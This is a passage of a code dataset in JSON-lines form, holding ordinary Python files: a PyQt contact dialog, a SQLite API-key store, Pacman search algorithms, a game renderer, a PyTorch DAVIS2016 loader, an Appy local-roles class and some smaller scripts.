trollius.get_event_loop()\n\nloop.add_reader(fd, process_keys)\n\nloop.run_forever()\n\ntermios.tcsetattr(fd, termios.TCSAFLUSH, oldterm)\nfcntl.fcntl(fd, fcntl.F_SETFL, oldflags)\n","sub_path":"gazebo/tests/control/test_keyboard.py","file_name":"test_keyboard.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"543733963","text":"from PyQt5.QtGui import QStandardItemModel, QStandardItem\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QDialog, QLabel, QComboBox, QPushButton\nimport logging\n\nlogger = logging.getLogger('client')\n\n\nclass AddContactDialog(QDialog):\n \"\"\"\n Диалог добавления пользователя в список контактов.\n Предлагает пользователю список возможных контактов и\n добавляет выбранный в контакты.\n \"\"\"\n\n def __init__(self, transport, database):\n super().__init__()\n self.transport = transport\n self.database = database\n\n self.setFixedSize(350, 120)\n self.setWindowTitle('Выберите контакт для добавления:')\n self.setAttribute(Qt.WA_DeleteOnClose)\n self.setModal(True)\n\n self.selector_label = QLabel('Выберите контакт для добавления:', self)\n 
self.selector_label.setFixedSize(200, 20)\n self.selector_label.move(10, 0)\n\n self.selector = QComboBox(self)\n self.selector.setFixedSize(200, 20)\n self.selector.move(10, 30)\n\n self.btn_refresh = QPushButton('Обновить список', self)\n self.btn_refresh.setFixedSize(120, 30)\n self.btn_refresh.move(60, 60)\n\n self.btn_ok = QPushButton('Добавить', self)\n self.btn_ok.setFixedSize(100, 30)\n self.btn_ok.move(230, 20)\n\n self.btn_cancel = QPushButton('Отмена', self)\n self.btn_cancel.setFixedSize(100, 30)\n self.btn_cancel.move(230, 60)\n self.btn_cancel.clicked.connect(self.close)\n\n self.setStyleSheet(\n \"\"\"\nQWidget\n{\n color: #b1b1b1;\n background-color: #323232;\n}\n\nQTreeView, QListView\n{\n background-color: silver;\n margin-left: 5px;\n}\n\nQWidget:item:hover\n{\n background-color: QLinearGradient( x1: 0, y1: 0, x2: 0, y2: 1, stop: 0 #ffa02f, stop: 1 #ca0619);\n color: #000000;\n}\n\nQWidget:item:selected\n{\n background-color: QLinearGradient( x1: 0, y1: 0, x2: 0, y2: 1, stop: 0 #ffa02f, stop: 1 #d7801a);\n}\nQComboBox\n{\n selection-background-color: #ffaa00;\n background-color: QLinearGradient( x1: 0, y1: 0, x2: 0, y2: 1, stop: 0 #565656, stop: 0.1 #525252, stop: 0.5 #4e4e4e, stop: 0.9 #4a4a4a, stop: 1 #464646);\n border-style: solid;\n border: 1px solid #1e1e1e;\n border-radius: 5;\n}\n\nQComboBox:hover,QPushButton:hover\n{\n border: 2px solid QLinearGradient( x1: 0, y1: 0, x2: 0, y2: 1, stop: 0 #ffa02f, stop: 1 #d7801a);\n}\n\n\nQComboBox:on\n{\n padding-top: 3px;\n padding-left: 4px;\n background-color: QLinearGradient( x1: 0, y1: 0, x2: 0, y2: 1, stop: 0 #2d2d2d, stop: 0.1 #2b2b2b, stop: 0.5 #292929, stop: 0.9 #282828, stop: 1 #252525);\n selection-background-color: #ffaa00;\n}\n\nQComboBox QAbstractItemView\n{\n border: 2px solid darkgray;\n selection-background-color: QLinearGradient( x1: 0, y1: 0, x2: 0, y2: 1, stop: 0 #ffa02f, stop: 1 #d7801a);\n}\n\nQComboBox::drop-down\n{\n subcontrol-origin: padding;\n subcontrol-position: top right;\n width: 15px;\n\n border-left-width: 0px;\n border-left-color: darkgray;\n border-left-style: solid; /* just a single line */\n border-top-right-radius: 3px; /* same radius as the QComboBox */\n border-bottom-right-radius: 3px;\n }\n\nQComboBox::down-arrow\n{\n image: url(:/dark_orange/img/down_arrow.png);\n}\n\nQPushButton\n{\n color: #b1b1b1;\n background-color: QLinearGradient( x1: 0, y1: 0, x2: 0, y2: 1, stop: 0 #565656, stop: 0.1 #525252, stop: 0.5 #4e4e4e, stop: 0.9 #4a4a4a, stop: 1 #464646);\n border-width: 1px;\n border-color: #1e1e1e;\n border-style: solid;\n border-radius: 6;\n padding: 3px;\n font-size: 12px;\n padding-left: 5px;\n padding-right: 5px;\n min-width: 40px;\n}\n\nQPushButton:pressed\n{\n background-color: QLinearGradient( x1: 0, y1: 0, x2: 0, y2: 1, stop: 0 #2d2d2d, stop: 0.1 #2b2b2b, stop: 0.5 #292929, stop: 0.9 #282828, stop: 1 #252525);\n}\n \"\"\"\n )\n\n # Заполняем список возможных контактов\n self.possible_contacts_update()\n # Назначаем действие на кнопку обновить\n self.btn_refresh.clicked.connect(self.update_possible_contacts)\n\n def possible_contacts_update(self):\n \"\"\"\n Метод заполнения списка возможных контактов.\n Создаёт список всех зарегистрированных пользователей\n за исключением уже добавленных в контакты и самого себя.\n \"\"\"\n self.selector.clear()\n # множества всех контактов и контактов клиента\n contacts_list = set(self.database.get_contacts())\n users_list = set(self.database.get_users())\n # Удалим сами себя из списка пользователей, чтобы нельзя было добавить самого себя\n 
users_list.remove(self.transport.username)\n # Добавляем список возможных контактов\n self.selector.addItems(users_list - contacts_list)\n\n def update_possible_contacts(self):\n \"\"\"\n Метод обновления списка возможных контактов. Запрашивает с сервера\n список известных пользователей и обновляет содержимое окна.\n \"\"\"\n try:\n self.transport.user_list_update()\n except OSError:\n pass\n else:\n logger.debug('Обновление списка пользователей с сервера выполнено')\n self.possible_contacts_update()\n","sub_path":"app/client/client/add_contact.py","file_name":"add_contact.py","file_ext":"py","file_size_in_byte":5888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"533894666","text":"#coding:utf-8\n \n \ndef script(s, player=None):\n from NaoQuest.objective import Objective\n from NaoCreator.setting import Setting\n if not player:\n Setting.error(\"Error in execution of post_script of objective \\\"planter\\\": player is None\")\n return\n if not s.completed:\n s.wait_for = False\n","sub_path":"Save Scenario/Prsensation/scripts/planter_post.py","file_name":"planter_post.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"374332881","text":"import sqlite3\n\n\nclass UserApiKey(object):\n\n def __init__(self, db=None):\n if db:\n self.conn = sqlite3.connect(db)\n else:\n self.conn = sqlite3.connect('keys.db')\n\n def create_table(self):\n cur = self.conn.cursor()\n cur.execute('''CREATE TABLE keys (owner, userid, vcode)''')\n\n def add_key(self, owner, userid, vcode):\n cur = self.conn.cursor()\n cur.execute(\n '''INSERT INTO keys VALUES(?, ?, ?)''', (owner, userid, vcode))\n self.conn.commit()\n\n def get_keys(self, owner=None):\n cur = self.conn.cursor()\n out = []\n if owner:\n cur.execute(\n '''SELECT owner, userid, vcode FROM keys WHERE owner = ?''',\n (owner,))\n else:\n cur.execute('''SELECT owner, userid, vcode FROM keys''')\n for key in cur.fetchall():\n out.append({\n 'owner': key[0],\n 'userid': key[1],\n 'vcode': key[2]\n })\n return out\n\n def delete_key(self, owner, userid):\n cur = self.conn.cursor()\n cur.execute('''DELETE FROM keys WHERE owner=? 
AND userid=?''',\n (owner, userid))\n self.conn.commit()","sub_path":"source/UserApiKey.py","file_name":"UserApiKey.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"624363862","text":"\n#--------------------------------------------------------------------------------\n\nfrom sklearn.externals import joblib\n\nscaler = StandardScaler().fit(unscaled_x)\nsvc = LinearSVC()\nsvc.fit(x_train, y_train)\n\njoblib.dump(svc, 'svc.pkl')\njoblib.dump(scaler, 'scaler.pkl')\n\nsvc = joblib.load('svc.pkl')\nscaler = joblib.load('scaler.pkl')\n\n#--------------------------------------------------------------------------------\n\nimport matplotlib.pyplot as plt\nfrom numpy import min, max \n\n# matplotlib.colors.Colormap documentation\n# colormap \n# - used to convert data values (floats) from the interval [0, 1] to the RGBA color\n# For normalization, you can use matplotlib.colors.Normalize instead\n\ndef hot_to_rgb(heatmap):\n\n min_value, max_value = min(heatmap), max(heatmap)\n normalized_heatmap = (heatmap - min_value) / (max_value - min_value)\n \n colormap = plt.cm.get_cmap('hot') \n rgba = colormap(normalized_heatmap) \n \n r, g, b = rgba[:, :, 0], rgba[:, :, 1], rgba[:, :, 2]\n rgb_img = np.dstack((r, g, b))\n \n return rgb_img\n\n#--------------------------------------------------------------------------------\n\nclass HeatMap:\n\n # memory: number of frames to keep \n # threshold: to weed out transient positives\n # frame: colored video frame (720, 1280, 3)\n # map, labeledmap, thresholded_map: 2d array (720, 1280)\n # box: tuple (x, y, s), topleft corner, side length\n # history: list of list. inner list contain boxes for the frame\n def __init__(self, frame, memory, thresh):\n \n self.blank = np.zeros_like(frame[:, :, 0]).astype(np.float)\n self.map = np.copy(self.blank)\n self.thresholded_map = None\n self.labeled_map = None\n self.samples_found = 0\n self.thresh = thresh\n self.memory = memory\n self.history = []\n\n def reset(self):\n self.map = np.copy(self.blank)\n self.history = []\n\n def do_threshold(self):\n self.thresholded_map = np.copy(self.map)\n self.thresholded_map[self.map < self.thresh] = 0\n \n def get(self):\n self.do_threshold()\n self.label()\n return self.map, self.thresholded_map, self.labeled_map\n \n def remove(self, boxes):\n for box in boxes: \n x1, y1, x2, y2 = box_boundaries(box) \n self.map[y1: y2, x1: x2] -= 1\n \n def add(self, boxes):\n for box in boxes: \n x1, y1, x2, y2 = box_boundaries(box)\n self.map[y1: y2, x1: x2] += 1\n\n def update(self, boxes):\n \n if len(self.history) == self.memory:\n self.remove(self.history[0]) # remove boxes of oldest frame from heatmap\n self.history = self.history[1:] # remove the boxes from history\n \n self.add(boxes) # add boxes to heatmap\n self.history.append(boxes)\n \n # check scipy.ndimage.measurements.label documentation\n # label > 2-tuple\n # item 1: the number of labels (cars) found\n # item 0: An \"image\", the size of the heatmap input image\n # each 'pixel' of 'car box' will be labeled as (1, 2, 3... 
respectively) in item 1\n def label(self):\n labeled = label(self.thresholded_map)\n self.samples_found = labeled[1]\n self.labeled_map = labeled[0]\n\n # draws a bounding box on the video frame\n def draw(self, frame, color = (0, 225, 0), thickness = 10):\n \n this_frame = frame.copy()\n \n # for each \"car box\" detected\n for n in range(1, self.samples_found + 1):\n \n # of that specific \"car box\", get all x and y pixel locations\n coords = (self.labeled_map == n).nonzero() \n xs, ys = np.array(coords[1]), np.array(coords[0]) \n \n # get upperleft corner and lowerleft corner \n p1 = (np.min(xs), np.min(ys)) \n p2 = (np.max(xs), np.max(ys))\n \n cv2.rectangle(this_frame, p1, p2, color, thickness)\n \n return this_frame\n","sub_path":"w4/sample_code.py","file_name":"sample_code.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"639328116","text":"from Line import Line\nfrom Station import Station\nfrom Train import Train\nimport numpy as np\nfrom PIL import Image, ImageDraw\nfrom utils import totuple, get_rect, draw_ellipse, angle\n\nclass Game:\n def __init__(self, window_size):\n self.window_size = 1000\n self.margin = 50\n self.ticks = 0\n normal_speed = 0.05 * self.window_size\n self.trains = [\n Train(\"train 1\", normal_speed, 0, 1)\n # Train(\"train 1\", normal_speed, 0, 1), \n # Train(\"train 2\", normal_speed, 0, 1), \n # Train(\"train 3\", normal_speed, 0, 1), \n ]\n self.stations = [\n Station(\"station 1\", \"triangle\", self.spawn_xy()), \n Station(\"station 2\", \"square\", self.spawn_xy()),\n Station(\"station 3\", \"circle\", self.spawn_xy())\n ]\n\n self.lines = []\n self.available_special_types = [\"diamond\"]\n self.carriage_num = 0\n self.score = 0\n self.day = 0\n\n def spawn_xy(self):\n x = np.random.randint(self.margin, self.window_size-self.margin)\n y = np.random.randint(self.margin, self.window_size-self.margin)\n return np.array([x, y], dtype=np.float)\n \n def step(self):\n self.ticks += 1\n if self.ticks % 299 == 0:\n self.day += 1\n t1 = np.random.random()\n if t1 < 0.3:\n t2 = np.random.random()\n if t2 < 0.3:\n station_type = \"triangle\"\n elif t2 < 0.6:\n station_type = \"square\"\n elif t2 < 0.9:\n station_type = \"circle\"\n else:\n station_type = np.random.choice(self.available_special_types)\n new_station = Station(\"station \"+str(self.day+3), station_type, self.spawn_xy())\n self.stations.append(new_station)\n\n if self.ticks % 29 == 0:\n # populate stations\n for station in self.stations:\n if np.random.random() < 0.5:\n station.populate(self.available_special_types)\n \n for line in self.lines:\n for train in line.trains:\n if train.in_station:\n train.station.move_passengers()\n else:\n train.move()\n \n def draw(self):\n # draw background\n side = self.window_size\n line_width = int(0.01 * side)\n square_size = int(0.025 * side)\n triangle_size = int(0.05 * side)\n train_width = int(0.02 * side)\n train_height = int(0.06 * side)\n img = Image.new(mode='RGB', size=(side, side), color=(255, 255, 255))\n draw_img = ImageDraw.Draw(img)\n\n # draw lines\n for l in self.lines:\n line = []\n for s in l.stations:\n line.append(totuple(s.xy))\n draw_img.line(line, fill=(0, 0, 0), width=line_width)\n \n # draw stations\n for s in self.stations:\n if s.station_type == \"circle\":\n radius = 0.025 * side\n x0, y0 = s.xy\n x1 = x0 + radius\n y1 = y0 + radius\n # draw image\n draw_ellipse(draw=draw_img, bbox=[x0, y0, x1, y1], linewidth=line_width)\n else:\n if 
s.station_type == \"triangle\":\n L = triangle_size\n corners = np.array([[0, 0],\n [L, 0], \n [0.5 * L, 0.866 * L],\n [0, 0]])\n corners += s.xy\n elif s.station_type == \"square\":\n corners = get_rect(s.xy[0], s.xy[1], square_size, square_size, 0)\n elif s.station_type == \"diamond\": \n corners = get_rect(s.xy[0], s.xy[1], square_size, square_size, 90)\n\n # get tuple version of the points\n shape_tuple = totuple(corners)\n # draw image\n draw_img.polygon(xy=[tuple(p) for p in corners], fill=(255, 255, 255), outline=0)\n # draw line around polygon to adjust line width since polygon doesn't support it\n draw_img.line(xy=shape_tuple, fill=(0, 0, 0), width=line_width)\n \n # draw trains\n for t in self.trains:\n corners = get_rect(t.xy[0], t.xy[1], train_height, train_width, t.angle)\n # get tuple version of the points\n shape_tuple = totuple(corners)\n # draw image\n draw_img.polygon(xy=[tuple(p) for p in corners], fill=(0, 0, 0), outline=0)\n \n image = np.asarray(img)\n image = np.copy(image)\n image = image / 255.0\n\n return image","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":4725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"122972564","text":"# search.py\n# ---------\n# Licensing Information: You are free to use or extend these projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.\n# \n# Attribution Information: The Pacman AI projects were developed at UC Berkeley.\n# The core projects and autograders were primarily created by John DeNero\n# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\n# Student side autograding was added by Brad Miller, Nick Hay, and\n# Pieter Abbeel (pabbeel@cs.berkeley.edu).\n#\n#Code updated by Sumit Rawat (srawat7@asu.edu)\n\n\n\"\"\"\nIn search.py, you will implement generic search algorithms which are called by\nPacman agents (in searchAgents.py).\n\"\"\"\n\nimport util\nfrom util import Queue\nimport numpy as np\n\nclass SearchProblem:\n \"\"\"\n This class outlines the structure of a search problem, but doesn't implement\n any of the methods (in object-oriented terminology: an abstract class).\n\n You do not need to change anything in this class, ever.\n \"\"\"\n\n def getStartState(self):\n \"\"\"\n Returns the start state for the search problem.\n \"\"\"\n util.raiseNotDefined()\n\n def isGoalState(self, state):\n \"\"\"\n state: Search state\n\n Returns True if and only if the state is a valid goal state.\n \"\"\"\n util.raiseNotDefined()\n\n def getSuccessors(self, state):\n \"\"\"\n state: Search state\n\n For a given state, this should return a list of triples, (successor,\n action, stepCost), where 'successor' is a successor to the current\n state, 'action' is the action required to get there, and 'stepCost' is\n the incremental cost of expanding to that successor.\n \"\"\"\n util.raiseNotDefined()\n\n def getCostOfActions(self, actions):\n \"\"\"\n actions: A list of actions to take\n\n This method returns the total cost of a particular sequence of actions.\n The sequence must be composed of legal moves.\n \"\"\"\n util.raiseNotDefined()\n\n\ndef tinyMazeSearch(problem):\n \"\"\"\n Returns a sequence of moves that solves tinyMaze. 
For any other maze, the\n sequence of moves will be incorrect, so only use this for tinyMaze.\n \"\"\"\n from game import Directions\n s = Directions.SOUTH\n w = Directions.WEST\n return [s, s, w, s, w, w, s, w]\n\ndef depthFirstSearch(problem):\n \"\"\"\n Search the deepest nodes in the search tree first.\n\n Your search algorithm needs to return a list of actions that reaches the\n goal. Make sure to implement a graph search algorithm.\n\n To get started, you might want to try some of these simple commands to\n understand the search problem that is being passed in:\n\n print \"Start:\", problem.getStartState()\n print \"Is the start a goal?\", problem.isGoalState(problem.getStartState())\n print \"Start's successors:\", problem.getSuccessors(problem.getStartState())\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n curr_state = problem.getStartState()\n visited_states = set()\t#to store the states already visited\n path = []\t\n stack = util.Stack()\t#fringe for DFS is a LIFO stack\n stack.push((curr_state, path))\n while not problem.isGoalState(curr_state):\t#loop till we reach goal state\n \tif curr_state not in visited_states:\n \t\tvisited_states.add(curr_state)\t#mark state as visited\n \t\tsuccessor_list = problem.getSuccessors(curr_state)\t#get successors\n \t\tfor (successor_state, next_direction, _) in successor_list:\n \t\t\tstack.push((successor_state, path + [next_direction]))\n \t(curr_state, path) = stack.pop()\n return path\n #util.raiseNotDefined()\n\ndef breadthFirstSearch(problem):\n \"\"\"Search the shallowest nodes in the search tree first.\"\"\"\n \"*** YOUR CODE HERE ***\"\n curr_state = problem.getStartState()\n visited_states = set()\t#to store the states already visited\n path = []\n queue = util.Queue()\t#fringe for DFS is a FIFO queue\n queue.push((curr_state, path))\n while not problem.isGoalState(curr_state):\t#loop till we reach goal state\n \tif curr_state not in visited_states:\n \t\tvisited_states.add(curr_state)\t#mark state as visited\n \t\tsuccessor_list = problem.getSuccessors(curr_state) #get successors\n \t\tfor (successor_state, next_direction, _) in successor_list:\n \t\t\tqueue.push((successor_state, path + [next_direction]))\n \t(curr_state, path) = queue.pop()\n return path\n #util.raiseNotDefined()\n\ndef uniformCostSearch(problem):\n \"\"\"Search the node of least total cost first.\"\"\"\n \"*** YOUR CODE HERE ***\"\n curr_state = problem.getStartState()\n visited_states = set()\t#to store the states already visited\n path = []\n curr_cost = 0\n pQueue = util.PriorityQueue()\t#fringe for UCS is a Priority queue\n pQueue.push((curr_state, path, curr_cost), curr_cost)\n while not problem.isGoalState(curr_state):\t#loop till we reach goal state\n \tif curr_state not in visited_states:\n \t\tvisited_states.add(curr_state)\t#mark state as visited\n \t\tsuccessor_list = problem.getSuccessors(curr_state)\t#get successors\n \t\tfor (successor_state, next_direction, additional_cost) in successor_list:\n \t\t\tpQueue.push((successor_state, path + [next_direction], curr_cost + additional_cost), curr_cost + additional_cost)\n \t(curr_state, path, curr_cost) = pQueue.pop()\n return path\n #util.raiseNotDefined()\n\ndef nullHeuristic(state, problem=None):\n \"\"\"\n A heuristic function estimates the cost from the current state to the nearest\n goal in the provided SearchProblem. 
This heuristic is trivial.\n \"\"\"\n return 0\n\ndef nullHeuristic_bi(position, problem, dir = 0, info={}):\n \"\"\"\n A heuristic function estimates the cost from the current state to the nearest\n goal in the provided bidirectional SearchProblem. This heuristic is trivial.\n \"\"\"\n return 0\n\ndef aStarSearch(problem, heuristic=nullHeuristic):\n \"\"\"Search the node that has the lowest combined cost and heuristic first.\"\"\"\n \"*** YOUR CODE HERE ***\"\n curr_state = problem.getStartState()\n visited_states = set()\t#to store the states already visited\n path = []\n curr_cost = 0\n pQueue = util.PriorityQueue()\t#fringe for A* is a Priority queue\n pQueue.push((curr_state, path, curr_cost), curr_cost + heuristic(curr_state, problem))\n while not problem.isGoalState(curr_state):\t#loop till we reach goal state\n if curr_state not in visited_states:\n visited_states.add(curr_state)\t#mark state as visited\n successor_list = problem.getSuccessors(curr_state)\t#get successors\n for (successor_state, next_direction, additional_cost) in successor_list:\n pQueue.push((successor_state, path + [next_direction], curr_cost + additional_cost), curr_cost + additional_cost + heuristic(successor_state, problem))\n (curr_state, path, curr_cost) = pQueue.pop()\n return path\n #util.raiseNotDefined()\n\n\ndef bidirectionalMMsearch(problem, heuristic=nullHeuristic):\n \"\"\"Implementation of bidirectional A* search that Meets in the Middle\n A search starts from the start node towards the goal node and another\n starts from teh goal node towards the start node. These searches meet in the middle\n and the cheapest solution is found.\n \"\"\"\n #start point of the forward search\n curr_state_fwd = problem.getStartState()\n # start point of the backward search\n curr_state_bck = problem.getGoalState()\n # Lists to store the actions followed for the forward and backward searches\n path_fwd = []\n path_bck = []\n # dictonaries for states and their g values in the forward and backward direction\n g_fwd = {curr_state_fwd: 0}\n g_bck = {curr_state_bck: 0}\n # open and closed lists in the forward and backward directions\n open_fwd = [(curr_state_fwd, path_fwd)]\n open_bck = [(curr_state_bck, path_bck)]\n closed_fwd = []\n closed_bck = []\n # U = Cost of the cheapest solution found so far\n U = np.inf\n\n def search_dir(U, open1, open2, g1, g2, closed, dir):\n \"Search in the direction dir\"\n n, path = min_p_g(C, open1, g1, dir)\n open1.remove((n, path))\n closed.append((n, path))\n successor_list = problem.getSuccessors(n)\n for (c, next_direction, additional_cost) in successor_list:\n if found(open1, c) or found(closed, c):\n if g1[c] <= g1[n] + additional_cost:\n continue\n\n open1 = delete(open1, c)\n\n g1[c] = g1[n] + additional_cost\n open1.append((c, path + [next_direction]))\n #visited_states.add(c)\n if found(open2, c):\n U = min(U, g1[c] + g2[c])\n\n return U, open1, closed, g1\n\n def delete(open1, n):\n \"\"\"Delete state n from Open list open1\"\"\"\n for (c, path) in open1:\n if c == n:\n open1.remove((c, path))\n return open1\n\n def found(open1, n):\n \"\"\"Check if the state n is on the Open list open1\"\"\"\n for (c, path) in open1:\n if c == n:\n return True\n return False\n\n def choose_min_n(open1, g, dir):\n \"\"\"Function to find the minimum values of f and g\n for the states in the open list in the current direction\"\"\"\n prmin, prmin_F = np.inf, np.inf\n for (n, path) in open1:\n f = g[n] + heuristic(n, problem, dir)\n pr = max(f, 2 * g[n])\n prmin = min(prmin, pr)\n prmin_F = 
min(prmin_F, f)\n\n return prmin, prmin_F, min(g.values())\n\n def min_p_g(prmin, open1, g, dir):\n \"\"\"find prmin and gmin in open list\"\"\"\n m = np.inf\n node = problem.goal\n final_path = []\n for (n, path) in open1:\n pr = max(g[n] + heuristic(n, problem, dir), 2 * g[n])\n if pr == prmin:\n if g[n] < m:\n m = g[n]\n node = n\n final_path = path\n\n return node, final_path\n\n def getPath(open_fwd, open_bck):\n \"\"\"Get the optimal forward and backward path\"\"\"\n for (nf, path_fwd) in open_fwd:\n for (nb, path_bck) in open_bck:\n if(nf == nb):\n return path_fwd, path_bck\n #If no nodes are found to be common\n print('No common node found #SR')\n\n\n def opposite(path):\n \"\"\"Reverse the directions in the given path. This is used for the path from\n the goal node to the start node\"\"\"\n reversed_path = []\n for i in path:\n # Convert NORTH to SOUTH\n if i == 'North':\n reversed_path.append('South')\n # Convert SOUTH to NORTH\n elif i == 'South':\n reversed_path.append('North')\n # Convert EAST to WEST\n elif i == 'East':\n reversed_path.append('West')\n # Convert WEST to EAST\n else:\n reversed_path.append('East')\n #print('\\n Path_bck = {0}'.format(j))\n return reversed_path\n\n #while the open lists are not empty\n while open_fwd and open_bck:\n prmin_F, fmin_fwd, gmin_fwd = choose_min_n(open_fwd, g_fwd, 0)\n prmin_b, fmin_bck, gmin_bck = choose_min_n(open_bck, g_bck, 1)\n C = min(prmin_F, prmin_b)\n\n if U <= max(C, fmin_fwd, fmin_bck, gmin_fwd + gmin_bck + 1):\n \"\"\"The condition that indicates that the optimal solution has been found.\n The cost of the cheapest edge in this problem is 1\"\"\"\n \"\"\"\n totalOpenNodes = len(open_fwd) + len(open_bck) + 1\n totalClosedNodes = len(closed_fwd) + len(closed_bck)\n print('\\nTotal nodes expanded = {0}'.format(totalOpenNodes + totalClosedNodes))\n print(' (open nodes = {0} and closed nodes = {1})'.format(totalOpenNodes, totalClosedNodes))\n \"\"\"\n print('\\nPath length = {0}'.format(U))\n path_fwd, path_bck = getPath(open_fwd, open_bck)\n #print('\\n path_bck = {0}'.format(path_bck))\n path_bck = reversed(path_bck)\n #print('\\n Path_fwd = {0}'.format(path_fwd))\n if path_bck:\n path_fwd= path_fwd + opposite(path_bck)\n problem.isGoalState(problem.getGoalState())\n return path_fwd\n\n if C == prmin_F:\n # Search in the forward direction\n U, open_fwd, closed_fwd, g_fwd = search_dir(U, open_fwd, open_bck, g_fwd, g_bck, closed_fwd, 0)\n else:\n # Search in the backward direction\n U, open_bck, closed_bck, g_bck = search_dir(U, open_bck, open_fwd, g_bck, g_fwd, closed_bck, 1)\n\n #Incase U never reaches the optimal value\n print('\\nPath length = infinity')\n return path_fwd\n\n\n# Abbreviations\nbfs = breadthFirstSearch\ndfs = depthFirstSearch\nastar = aStarSearch\nucs = uniformCostSearch\nmm = bidirectionalMMsearch\n","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":12998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"28973867","text":"#!/usr/bin/env python3\nimport sys\nfrom signal import signal, SIGPIPE, SIG_DFL\n\nsignal(SIGPIPE, SIG_DFL)\n\npunk = '.!?'\n\ndef is_well_formed(line):\n if len(line) < 31:\n return False\n\n x = line[0]\n if not x.isalpha() or not x.isupper():\n return False\n if not line[-2] in punk: # last character is '\\n'\n return False\n\n i = 0\n for c in line:\n if c.isalpha():\n i += 1\n if i == 30:\n return True\n return False\n\n\nif __name__ == '__main__':\n for line in sys.stdin:\n if 
is_well_formed(line):\n sys.stdout.write(line)\n","sub_path":"scripts/well-formed.py","file_name":"well-formed.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"645471185","text":"import pickle \nimport os\nimport numpy as np\nimport cv2\nfrom scipy.misc import imresize\nfrom util.helpers import *\nfrom torch.utils.data import Dataset\n\nclass DAVIS2016(Dataset):\n def __init__(self, root, split='train', img_size=(256, 512), transform=None):\n self.transform = transform\n self.img_size = img_size\n self.meanval = (104.00699, 116.66877, 122.67892)\n\n with open(root, 'rb') as fp:\n contents = pickle.load(fp)\n tmp = contents[split]\n self.data = tmp['images']\n self.label= tmp['labels']\n self.noseq= tmp['noseq']\n\n self.shape = self.data.shape\n\n def __getitem__(self, index):\n '''\n img, lbl= self.data[index], self.label[index]\n img = np.array(img, dtype=np.float32)\n img = np.subtract(img, np.array(self.meanval, dtype=np.float32))\n '''\n if index not in self.noseq:\n img1, lbl1= self.data[index] , self.label[index]\n img2, lbl2= self.data[index+1], self.label[index+1]\n img3, lbl3= self.data[index+2], self.label[index+2]\n else:\n img1, lbl1= self.data[index-2], self.label[index-2]\n img2, lbl2= self.data[index-1], self.label[index-1]\n img3, lbl3= self.data[index] , self.label[index]\n\n img1 = np.array(img1, dtype=np.float32)\n img1 = np.subtract(img1, np.array(self.meanval, dtype=np.float32))\n img2 = np.array(img2, dtype=np.float32)\n img2 = np.subtract(img2, np.array(self.meanval, dtype=np.float32))\n img3 = np.array(img3, dtype=np.float32)\n img3 = np.subtract(img3, np.array(self.meanval, dtype=np.float32))\n \n lbl1 = np.expand_dims(lbl1, axis=2)\n lbl2 = np.expand_dims(lbl2, axis=2)\n lbl3 = np.expand_dims(lbl3, axis=2)\n \n img = np.concatenate((img1,img2,img3),2)\n lbl = np.concatenate((lbl1,lbl2,lbl3),2)\n \n sample = {'image': img, 'gt': lbl}\n if self.transform is not None:\n sample = self.transform(sample)\n \n sample1 = {'image': sample['image'][0:3, :, :], 'gt': sample['gt'][0, :, :]}\n sample2 = {'image': sample['image'][3:6, :, :], 'gt': sample['gt'][1, :, :]}\n sample3 = {'image': sample['image'][6:9, :, :], 'gt': sample['gt'][2, :, :]}\n\n return sample1, sample2, sample3\n \n def __len__(self):\n return self.data.shape[0]\n\n","sub_path":"PSPNet/util/loader/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"242711321","text":"'''Data structure storing local roles on every Appy object'''\n\n#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nfrom persistent.list import PersistentList\nfrom persistent.mapping import PersistentMapping\n\n# Errors - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nNO_LOGIN_OR_ROLE = 'Empty login or role.'\nNO_LOGIN_AND_ROLE = 'Empty login and role.'\n\n#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nclass LocalRoles(PersistentMapping):\n '''Dict-like data structure storing local roles on an Appy object'''\n\n # Dict has spec {s_login: [s_role]} and defines, for every user or group\n # login, the list of roles granted to him on the linked object.\n\n def __init__(self):\n PersistentMapping.__init__(self)\n # When boolean \"only\" is True, the workflow behaves differently: it only\n # checks local roles (and thus it ignores the 
user's global roles).\n # Read this attribute in the context of an object:\n # \"o.localRoles.only\"\n self.only = False\n\n def add(self, login, role, o=None):\n '''Grants to some p_login (or several if p_login is a list/tuple) a\n given local p_role (or several if p_role is a list/tuple). Returns\n the number of actually added local roles.'''\n\n # Security information for any object is indexed. So if the object being\n # modified is not the main object of a ui transaction (ie, not triggered\n # within m_onEdit), give it in p_o and security-related info on it will\n # be reindexed.\n\n if not login or not role: raise Exception(NO_LOGIN_OR_ROLE)\n r = 0\n # Standardise parameters\n login = (login,) if isinstance(login, str) else login\n role = (role,) if isinstance(role, str) else role\n # Browse logins to update\n for l in login:\n # Get or create the list of local roles for this login\n if l in self:\n roles = self[l]\n else:\n self[l] = roles = PersistentList()\n # Browse roles to grant\n for rol in role:\n if rol not in roles:\n 